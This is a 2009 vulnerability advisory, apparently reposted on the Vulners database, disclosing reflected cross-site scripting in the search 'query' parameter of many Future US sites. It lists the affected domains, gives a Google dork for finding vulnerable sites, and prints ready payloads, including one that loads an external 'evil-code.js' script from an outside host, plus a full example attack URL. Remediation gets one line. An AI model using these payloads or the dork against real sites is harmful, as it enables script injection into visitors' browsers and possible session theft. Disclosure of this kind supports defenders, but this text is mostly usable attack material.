` NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+===================================================================================================================+
+ Copyright 2008 - Copyright 2008 Future US //Cross-site scripting (XSS) Remote Java Execution +
+===================================================================================================================+
Author(s): Ivan Sanchez
Product: Copyright 2008 Future US
http://www.futureus-inc.com/
http://www.dailyradar.com/
Date: 16/01/2009
A lot domains are affected:
---------------------------
MovieBlips - Your daily movie news
ShowHype - Biggest stories, best fans
TVBlips - For TV aficionados only
42Blips - For science fiction fans
ComicsBlips - Excelsior! Comics news galore!
TotalFilm - Welcome to the movies!
BallHype - Best stories, biggest fans
ActionSportsBlips - Surf, Skate, Ski, Snowboard
BikeRadar - The world is for riding
MMABlips - News to fight for
RacingBlips - News built for speed
CyclingNews - The world centre of cycling
WallStreetBlips - Show me the money
BeltwayBlips - All politics, all the time
EarthBlips - Re-imagine the planet
much more......
Exploited from querystring or put into the texbox some evil xss-code or external java code , and then you can see the querystring :-
or directly you put the evil code on the querystring .
GOOGLE DORKS:
------------
intext:"Copyright 2008 Future US"
Parameter Affected:
-------------------
query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E
query="><script>alert(/CCC/)</script>&t=advanced&s=0&d=0&start=60
query="></a><script>alert(1);</script>
Example url:
http://domain/search/?query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E
Remediation: Validate the Input.
------------
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+===================================================================================================================+
+ Copyright 2008 - Copyright 2008 Future US // Cross-site scripting (XSS) Remote Java Execution +
+===================================================================================================================+
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation